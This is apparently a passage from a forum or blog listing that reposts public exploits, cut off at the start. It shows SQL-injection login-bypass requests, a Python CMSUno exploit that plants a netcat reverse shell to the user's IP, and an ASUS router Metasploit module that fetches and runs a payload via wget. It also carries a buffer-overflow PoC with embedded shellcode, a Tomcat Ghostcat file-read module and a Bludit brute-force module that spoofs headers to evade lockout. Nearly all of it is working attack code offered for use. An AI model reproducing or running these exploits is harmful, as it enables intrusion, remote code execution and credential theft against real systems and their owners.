en-US,en;q=0.9 Connection: close username='%20or%200%3d0%20#&password=password Response: HTTP/1.1 200 OK Date: Mon, 02 Nov 2020 04:30:51 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30 X-Powered-By: PHP/7.2.30 Set-Cookie: PHPSESSID=4q8t10sshr36he7sl19hb563a0; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 48 Connection: close Content-Type: text/html; charset=UTF-8 <script>windows: location="billing.php"</script> ========================================================================= POST /wbs/process.php HTTP/1.1 Host: 192.168.56.102:8080 Content-Length: 48 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.56.102:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.56.102:8080/wbs/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close username=admin&password=a'%20or%20'a'%20%3d%20'a Response: HTTP/1.1 200 OK Date: Mon, 02 Nov 2020 04:30:49 GMT Server: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.2.30 X-Powered-By: PHP/7.2.30 Set-Cookie: PHPSESSID=34a478h4bhtliatg8l71kmp10r; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 48 Connection: close Content-Type: text/html; charset=UTF-8 <script>windows: location="billing.php"</script>
  21. HireHackking

    CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated)

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: CMSUno 1.6.2 - 'user' Remote Code Execution (Authenticated) # Google Dork: N/A # Date: 2020.09.30 # Exploit Author: Fatih Çelik # Vendor Homepage: https://github.com/boiteasite/cmsuno/ # Software Link: https://github.com/boiteasite/cmsuno/ # Blog: https://fatihhcelik.blogspot.com/2020/09/cmsuno-162-remote-code-execution.html # Version: 1.6.2 # Tested on: Kali Linux 2020.2 # CVE : N/A import requests from bs4 import BeautifulSoup import lxml import json from time import sleep username = input("username: ") password = input("password: ") root_url = input("Root URL: http://192.168.1.9/cmsuno --> ") listener_ip = input("Your ip: ") listener_port = input("Your port for reverse shell: ") login_url = root_url + "/uno.php" vulnerable_url = root_url + "/uno/central.php" session = requests.Session() request = session.get(login_url) # Get the unox value soup = BeautifulSoup(request.text,"lxml") unox = soup.find("input",{'name':'unox'})['value'] # Login body = {"unox":unox,"user":username,"pass":password} session.post(login_url, data=body) # Get the second unox value request = session.get(login_url) text = request.text soup = BeautifulSoup(text,"lxml") script = soup.findAll('script')[1].string data = script.split("Unox='")[1] unox = data.split("',")[0] # Exploit header = { "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:80.0) Gecko/20100101 Firefox/80.0", "Accept":"*/", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Origin": login_url, "Referer": login_url } payload = 'en";system(\'nc.traditional {} {} -e /bin/bash\');?>// '.format(listener_ip,listener_port) body = 'action=sauvePass&unox={}&user0={}&pass0={}&user={}&pass=654321&lang=en'.format(unox,username,password,payload) session.post(vulnerable_url, data=(json.dumps(body)).replace("\\","")[1:-1],headers=header) # Login to trigger password.php # Get the unox value session1 = requests.Session() request1 = session1.get(login_url) soup = BeautifulSoup(request1.text,"lxml") unox = soup.find("input",{'name':'unox'})['value'] # Login sleep(3) body = {"unox":unox,"user":username,"pass":password} session1.post(login_url, data=body)
  22. HireHackking

    ASUS TM-AC1900 - Arbitrary Command Execution (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer include Msf::Exploit::Remote::HttpClient include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'ASUS TM-AC1900 - Arbitrary Command Execution', 'Description' => %q{ This module exploits a code execution vulnerability within the ASUS TM-AC1900 router as an authenicated user. The vulnerability is due to a failure filter out percent encoded newline characters (%0a) within the HTTP argument 'SystemCmd' when invoking "/apply.cgi" which bypasses the patch for CVE-2018-9285. }, 'Author' => [ 'b1ack0wl' # vuln discovery + exploit developer ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'References' => [ # CVE which shows that this functionality has been patched before ;) ['URL', 'https://www.cvedetails.com/cve/CVE-2018-9285/'], ['URL', 'https://github.com/b1ack0wl/OffensiveCon20/tree/master/TM-AC1900'] ], 'Privileged' => true, 'Targets' => [ # this may work on other asus routers as well, but I've only tested this on the TM-AC1900. [ 'ASUS TM-AC1900 <= v3.0.0.4.376_3199', {} ] ], 'DisclosureDate' => 'April 18, 2020', 'DefaultTarget' => 0)) register_options( [ OptString.new('USERNAME', [true, 'Username for the web portal.', 'admin']), OptString.new('PASSWORD', [true, 'Password for the web portal.', 'admin']) ]) end def check_login begin res = send_request_cgi({ 'method' => 'GET', 'uri' => "/Main_Analysis_Content.asp", 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']) }) if res and res.code == 200 # all good :) return res else fail_with(Failure::NoAccess, 'Invalid password.') end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, 'Connection failed.') end end def on_request_uri(cli, request) if request.uri == '/' # injected command has been executed print_good("Sending bash script...") @filename = rand_text_alpha(16) bash_script = %Q| #!/bin/sh wget #{@lhost_srvport}/#{rand_text_alpha(16)} -O /tmp/#{@filename} chmod +x /tmp/#{@filename} /tmp/#{@filename} & | send_response(cli, bash_script) else # bash script has been executed. serve up the ELF file exe_payload = generate_payload_exe() print_good("Sending ELF file...") send_response(cli, exe_payload) # clean up register_file_for_cleanup("/tmp/index.html") register_file_for_cleanup("/tmp/#{@filename}") end end def exploit # make sure the supplied password is correct check_login if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::") srv_host = datastore['LHOST'] else srv_host = datastore['SRVHOST'] end print_status("Exploiting #{target.name}...") @lhost_srvport = "#{srv_host}:#{datastore['SRVPORT']}" start_service({'Uri' => {'Proc' => Proc.new { |cli, req| on_request_uri(cli, req) }, 'Path' => '/' }}) begin # store the cmd to be executed cmd = "ping+-c+1+127.0.0.1;cd+..;cd+..;cd+tmp;rm+index.html;" cmd << "wget+#{@lhost_srvport};chmod+777+index.html;sh+index.html" res = send_request_cgi({ 'method' => 'GET', 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), # spaces need to be '+' and not %20, so cheap hack.exe it is. # required HTTP args: SystemCmd, action_mode, and current_page 'uri' => "/apply.cgi?SystemCmd=#{cmd.gsub(';',"%0a")}&action_mode=+Refresh+&current_page=Main_Analysis_Content.asp" }) # now trigger it via check_login res = check_login if res and res.code == 200 print_status("Waiting up to 10 seconds for the payload to execute...") select(nil, nil, nil, 10) end rescue ::Rex::ConnectionError fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server") end end end
  23. HireHackking

    Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: Nidesoft 3GP Video Converter 2.6.18 - Local Stack Buffer Overflow # Date: 2020-07-30 # Author: Felipe Winsnes # Software Link: http://www.nidesoft.com/downloads/3gp-video-converter.exe # Version: 2.6.18 # Tested on: Windows 7 (x86) # Blog: https://whitecr0wz.github.io/ # Proof of Concept: # 1.- Run the python script, it will create the file "poc.txt". # 2.- Copy the content of the new file "poc.txt" to clipboard. # 3.- Open the application. # 4.- Paste the clipboard into the "License Code" parameter within registration. # 5.- Profit. import struct # msfvenom -p windows/exec CMD=calc.exe -f py -e x86/alpha_mixed EXITFUNC=thread # Payload size: 448 bytes buf = b"" buf += b"\x89\xe3\xdb\xd3\xd9\x73\xf4\x5e\x56\x59\x49\x49\x49" buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43" buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41" buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42" buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x59\x6c\x48\x68\x6d" buf += b"\x52\x43\x30\x57\x70\x33\x30\x65\x30\x6c\x49\x78\x65" buf += b"\x70\x31\x6f\x30\x51\x74\x6e\x6b\x50\x50\x34\x70\x6c" buf += b"\x4b\x73\x62\x76\x6c\x4c\x4b\x52\x72\x45\x44\x6e\x6b" buf += b"\x44\x32\x71\x38\x56\x6f\x6e\x57\x32\x6a\x31\x36\x55" buf += b"\x61\x49\x6f\x6e\x4c\x45\x6c\x30\x61\x61\x6c\x53\x32" buf += b"\x54\x6c\x47\x50\x6a\x61\x78\x4f\x74\x4d\x53\x31\x69" buf += b"\x57\x6a\x42\x4b\x42\x43\x62\x53\x67\x6c\x4b\x50\x52" buf += b"\x52\x30\x6c\x4b\x50\x4a\x55\x6c\x4e\x6b\x42\x6c\x36" buf += b"\x71\x44\x38\x5a\x43\x30\x48\x73\x31\x6a\x71\x63\x61" buf += b"\x6e\x6b\x56\x39\x35\x70\x37\x71\x68\x53\x4c\x4b\x71" buf += b"\x59\x35\x48\x58\x63\x74\x7a\x32\x69\x4c\x4b\x65\x64" buf += b"\x4c\x4b\x77\x71\x4a\x76\x65\x61\x79\x6f\x4e\x4c\x4b" buf += b"\x71\x48\x4f\x46\x6d\x67\x71\x78\x47\x37\x48\x39\x70" buf += b"\x72\x55\x39\x66\x45\x53\x61\x6d\x38\x78\x37\x4b\x73" buf += b"\x4d\x77\x54\x32\x55\x6d\x34\x63\x68\x6e\x6b\x30\x58" buf += b"\x45\x74\x65\x51\x6e\x33\x51\x76\x6c\x4b\x64\x4c\x72" buf += b"\x6b\x6c\x4b\x63\x68\x67\x6c\x47\x71\x4b\x63\x6c\x4b" buf += b"\x43\x34\x6e\x6b\x77\x71\x7a\x70\x4d\x59\x73\x74\x47" buf += b"\x54\x74\x64\x53\x6b\x51\x4b\x61\x71\x51\x49\x30\x5a" buf += b"\x73\x61\x6b\x4f\x79\x70\x61\x4f\x43\x6f\x70\x5a\x4c" buf += b"\x4b\x77\x62\x5a\x4b\x4e\x6d\x71\x4d\x72\x4a\x53\x31" buf += b"\x4e\x6d\x4c\x45\x6c\x72\x33\x30\x65\x50\x37\x70\x76" buf += b"\x30\x51\x78\x76\x51\x4e\x6b\x32\x4f\x6e\x67\x59\x6f" buf += b"\x58\x55\x6f\x4b\x49\x70\x77\x6d\x47\x5a\x75\x5a\x72" buf += b"\x48\x4d\x76\x6c\x55\x4f\x4d\x6f\x6d\x69\x6f\x49\x45" buf += b"\x57\x4c\x63\x36\x43\x4c\x54\x4a\x4f\x70\x79\x6b\x39" buf += b"\x70\x64\x35\x43\x35\x6f\x4b\x37\x37\x64\x53\x72\x52" buf += b"\x52\x4f\x61\x7a\x45\x50\x63\x63\x79\x6f\x6b\x65\x35" buf += b"\x33\x63\x51\x32\x4c\x61\x73\x54\x6e\x75\x35\x72\x58" buf += b"\x43\x55\x63\x30\x41\x41" jmpesp = struct.pack("<I", 0x66C33BEB) buffer = "A" * 4592 + jmpesp + "\x41\x49" * 5 + buf + "\xff" * 2000 f = open ("poc.txt", "w") f.write(buffer) f.close()
  24. HireHackking

    Apache Tomcat - AJP 'Ghostcat' File Read/Inclusion (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    require "msf/core" class MetasploitModule < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp def initialize(info = {}) super(update_info(info, "Name" => "Ghostcat", "Description" => %q{ When using the Apache JServ Protocol (AJP), care must be taken when trusting incoming connections to Apache Tomcat. Tomcat treats AJP connections as having higher trust than, for example, a similar HTTP connection. If such connections are available to an attacker, they can be exploited in ways that may be surprising. In Apache Tomcat 9.0.0.M1 to 9.0.0.30, 8.5.0 to 8.5.50 and 7.0.0 to 7.0.99, Tomcat shipped with an AJP Connector enabled by default that listened on all configured IP addresses. It was expected (and recommended in the security guide) that this Connector would be disabled if not required. This vulnerability report identified a mechanism that allowed: - returning arbitrary files from anywhere in the web application - processing any file in the web application as a JSP Further, if the web application allowed file upload and stored those files within the web application (or the attacker was able to control the content of the web application by some other means) then this, along with the ability to process a file as a JSP, made remote code execution possible. It is important to note that mitigation is only required if an AJP port is accessible to untrusted users. Users wishing to take a defence-in-depth approach and block the vector that permits returning arbitrary files and execution as JSP may upgrade to Apache Tomcat 9.0.31, 8.5.51 or 7.0.100 or later. A number of changes were made to the default AJP Connector configuration in 9.0.31 to harden the default configuration. It is likely that users upgrading to 9.0.31, 8.5.51 or 7.0.100 or later will need to make small changes to their configurations. }, "Author" => [ "A Security Researcher of Chaitin Tech", #POC "ThienNV - SunCSR" #Metasploit Module ], "License" => MSF_LICENSE, "References" => [ [ "CVE", "2020-1938"] ], "Privileged" => false, "Platform" => %w{ java linux win}, "Targets" => [ ["Automatic", { "Arch" => ARCH_JAVA, "Platform" => "win" } ], [ "Java Windows", { "Arch" => ARCH_JAVA, "Platform" => "win" } ], [ "Java Linux", { "Arch" => ARCH_JAVA, "Platform" => "linux" } ] ], "DefaultTarget" => 0)) register_options( [ OptString.new("FILENAME",[true,"File name","/WEB-INF/web.xml"]), OptBool.new('SSL', [ true, 'SSL', false ]), OptPort.new('PORTWEB', [ false, 'Set a port webserver']) ],self.class) end def method2code(method) methods = { "OPTIONS" => 1, "GET" => 2, "HEAD" => 3, "POST" => 4, "PUT" => 5, "DELETE" => 6, "TRACE" => 7, "PROPFIND" => 8 } code = methods[method] return code end def make_headers(headers) header2code = { "accept" => "\xA0\x01", "accept-charset" => "\xA0\x02", "accept-encoding" => "\xA0\x03", "accept-language" => "\xA0\x04", "authorization" => "\xA0\x05", "connection" => "\xA0\x06", "content-type" => "\xA0\x07", "content-length" => "\xA0\x08", "cookie" => "\xA0\x09", "cookie2" => "\xA0\x0A", "host" => "\xA0\x0B", "pragma" => "\xA0\x0C", "referer" => "\xA0\x0D", "user-agent" => "\xA0\x0E" } headers_ajp = Array.new for (header_name, header_value) in headers do code = header2code[header_name].to_s if code != "" headers_ajp.append(code) headers_ajp.append(ajp_string(header_value.to_s)) else headers_ajp.append(ajp_string(header_name.to_s)) headers_ajp.append(ajp_string(header_value.to_s)) end end return int2byte(headers.length,2), headers_ajp end def make_attributes(attributes) attribute2code = { "remote_user" => "\x03", "auth_type" => "\x04", "query_string" => "\x05", "jvm_route" => "\x06", "ssl_cert" => "\x07", "ssl_cipher" => "\x08", "ssl_session" => "\x09", "req_attribute" => "\x0A", "ssl_key_size" => "\x0B" } attributes_ajp = Array.new for attr in attributes name = attr.keys.first.to_s code = (attribute2code[name]).to_s value = attr[name] if code != "" attributes_ajp.append(code) if code == "\x0A" for v in value attributes_ajp.append(ajp_string(v.to_s)) end else attributes_ajp.append(ajp_string(value.to_s)) end end end return attributes_ajp end def ajp_string(message_bytes) message_len_int = message_bytes.length return int2byte(message_len_int,2) + message_bytes + "\x00" end def int2byte(data, byte_len=1) if byte_len == 1 return [data].pack("C") else return [data].pack("n*") end end def make_forward_request_package(method,headers,attributes) prefix_code_int = 2 prefix_code_bytes = int2byte(prefix_code_int) method_bytes = int2byte(method2code(method)) protocol_bytes = "HTTP/1.1" req_uri_bytes = "/index.txt" remote_addr_bytes = "127.0.0.1" remote_host_bytes = "localhost" server_name_bytes = datastore['RHOST'].to_s if datastore['SSL'] == true is_ssl_boolean = 1 else is_ssl_boolean = 0 end server_port_int = datastore['PORTWEB'] if server_port_int.to_s == "" server_port_int = (is_ssl_boolean ^ 1) * 80 + (is_ssl_boolean ^ 0) * 443 end is_ssl_bytes = int2byte(is_ssl_boolean,1) server_port_bytes = int2byte(server_port_int, 2) headers.append(["host", "#{server_name_bytes}:#{server_port_int}"]) num_headers_bytes, headers_ajp_bytes = make_headers(headers) attributes_ajp_bytes = make_attributes(attributes) message = Array.new message.append(prefix_code_bytes) message.append(method_bytes) message.append(ajp_string(protocol_bytes.to_s)) message.append(ajp_string(req_uri_bytes.to_s)) message.append(ajp_string(remote_addr_bytes.to_s)) message.append(ajp_string(remote_host_bytes.to_s)) message.append(ajp_string(server_name_bytes.to_s)) message.append(server_port_bytes) message.append(is_ssl_bytes) message.append(num_headers_bytes) message += headers_ajp_bytes message += attributes_ajp_bytes message.append("\xff") message_bytes = message.join send_bytes = "\x12\x34" + ajp_string(message_bytes.to_s) return send_bytes end def send_recv_once(data) buf = "" begin connect(true, {'RHOST'=>"#{datastore['RHOST'].to_s}", 'RPORT'=>datastore['RPORT'].to_i, 'SSL'=>datastore['SSL']}) sock.put(data) buf = sock.get_once || "" rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") ensure disconnect end return buf end def read_buf_string(buf, idx) len = buf[idx..(idx+2)].unpack('n')[0] idx += 2 print "#{buf[idx..(idx+len)]}" idx += len + 1 idx end def parse_response(buf, idx) common_response_headers = { "\x01" => "Content-Type", "\x02" => "Content-Language", "\x03" => "Content-Length", "\x04" => "Date", "\x05" => "Last-Modified", "\x06" => "Location", "\x07" => "Set-Cookie", "\x08" => "Set-Cookie2", "\x09" => "Servlet-Engine", "\x0a" => "Status", "\x0b" => "WWW-Authenticate", } idx += 2 idx += 2 if buf[idx] == "\x04" idx += 1 print "Status Code: " idx += 2 idx = read_buf_string(buf, idx) puts header_num = buf[idx..(idx+2)].unpack('n')[0] idx += 2 for i in 1..header_num if buf[idx] == "\xA0" idx += 1 print "#{common_response_headers[buf[idx]]}: " idx += 1 idx = read_buf_string(buf, idx) puts else idx = read_buf_string(buf, idx) print(": ") idx = read_buf_string(buf, idx) puts end end elsif buf[idx] == "\x05" return 0 elsif buf[idx] == "\x03" idx += 1 puts idx = read_buf_string(buf, idx) else return 1 end parse_response(buf, idx) end def run headers = Array.new method = "GET" target_file = datastore['FILENAME'].to_s attributes = [ {"req_attribute" => ["javax.servlet.include.request_uri", "index"]}, {"req_attribute" => ["javax.servlet.include.path_info" , target_file]}, {"req_attribute" => ["javax.servlet.include.servlet_path" , "/"]} ] data = make_forward_request_package(method, headers, attributes) buf = send_recv_once(data) parse_response(buf, 0) end end
  25. HireHackking

    Bludit 3.9.2 - Authentication Bruteforce Bypass (Metasploit)

    HireHackking posted a blog entry in Hacker Technology
    ## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient def initialize super( 'Name' => 'Bludit Panel Brute force', 'Description' => %q{ This Module performs brute force attack on Bludit Panel. }, 'Author' => 'Eren Simsek <egtorteam@gmail.com>', 'License' => MSF_LICENSE, 'DisclosureDate' => 'June 7 2020') register_options( [ OptString.new('TARGETURI', [ true, 'Bludit Panel Uri', 'admin']), OptString.new('USERNAME', [ false, 'Bludit account username']), OptString.new('PASSWORD', [ false, 'Bludit account password']), OptPath.new('USER_FILE', [ false, 'The User wordlist path']), OptPath.new('PASS_FILE', [ false, 'The Pass wordlist path']), OptBool.new('USER_AS_PASS', [ false, 'Try the username as the password for all users']), ]) end def check_variable if datastore["USERNAME"] != nil if datastore["USER_FILE"] != nil raise Msf::OptionValidateError.new(['USER_FILE']) end end if datastore["PASSWORD"] != nil if datastore["PASS_FILE"] != nil raise Msf::OptionValidateError.new(['PASS_FILE']) end end if datastore["USER_FILE"] != nil if datastore["USERNAME"] != nil raise Msf::OptionValidateError.new(['USERNAME']) end end if datastore["PASS_FILE"] != nil if datastore["PASSWORD"] != nil raise Msf::OptionValidateError.new(['PASSWORD']) end end end @signed = false def brute_force(username,password) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/'), 'method' => 'GET', }) #Send request target website username = username.strip password = password.strip #strip command remove spaces bluditkey = res.get_cookies #Send request target website and get cookies csrf = res.body.scan(/<input type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*?)">/).flatten[0] || '' #Get CSRF Token if bluditkey == nil #if cookies not found fail_with(Failure::UnexpectedReply, "Cookie Not Found !") end if csrf == nil #if csrf token not found fail_with(Failure::UnexpectedReply, "CSRF Not Found !") end print_warning("Trying #{username}:#{password}") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/'), 'method' => 'POST', 'cookie' => bluditkey, 'headers' => { 'X-Forwarded-For' => password, #host injected and unblock ip address 'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36', 'Referer' => normalize_uri(target_uri.path,'/'), }, 'vars_post' => { #post method variables 'tokenCSRF' => csrf, 'username' => username, 'password' => password, 'save' => '', }, }) if res && res.code != 200 #if request cod not 200 ok if res && res.headers['Location'] == '/admin/dashboard' #if signed web site print_good("Found #{username}:#{password}") @signed = true else #request not 200 error fail_with(Failure::UnexpectedReply, " Request Not Success Code #{res.code}") end end end def run check_variable #check variable, not use user_file if use username res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path,'/'), 'method' => 'GET', }) if res && res.code == 200 vprint_status("Request 200 OK") else fail_with(Failure::UnexpectedReply, "Request Not Success Code #{res.code}") end if datastore["USERNAME"] != nil && datastore["PASS_FILE"] != nil unless ::File.exist?(datastore['PASS_FILE']) #check file exit, error not found if not exist file fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!" end @wordlist = ::File.open(datastore["PASS_FILE"],"rb") #open pass_file @wordlist.each_line do |password| #each line on wordlist password = password.strip # remove spaces if !@signed # continue if signed false brute_force(datastore["USERNAME"],password) end end end if datastore["USER_FILE"] != nil && datastore["PASSWORD"] != nil unless ::File.exist?(datastore['USER_FILE']) fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!" end @wordlist = ::File.open(datastore["USER_FILE"],"rb") @wordlist.each_line do |username| username = username.strip if !@signed brute_force(username,datastore["PASSWORD"]) end end end if datastore["USER_FILE"] != nil && datastore["PASS_FILE"] != nil unless ::File.exist?(datastore['USER_FILE']) fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exists!" end unless ::File.exist?(datastore['PASS_FILE']) fail_with Failure::NotFound, "PASS_FILE #{datastore['PASS_FILE']} does not exists!" end @userlist = ::File.open(datastore["USER_FILE"],"rb") @userlist.each_line do |username| username = username.strip @passlist = ::File.open(datastore["PASS_FILE"],"rb") @passlist.each_line do |password| password = password.strip if !@signed brute_force(username,password) end end end end if datastore["USER_FILE"] != nil && datastore["USER_AS_PASS"] == true && datastore["PASS_FILE"] == nil unless ::File.exist?(datastore['USER_FILE']) fail_with Failure::NotFound, "USER_FILE #{datastore['USER_FILE']} does not exist!" end @userlist = ::File.open(datastore["USER_FILE"],"rb") @userlist.each_line do |username| username = username.strip @passlist = ::File.open(datastore["USER_FILE"],"rb") @passlist.each_line do |password| password = password.strip if !@signed brute_force(username,password) end end end end end end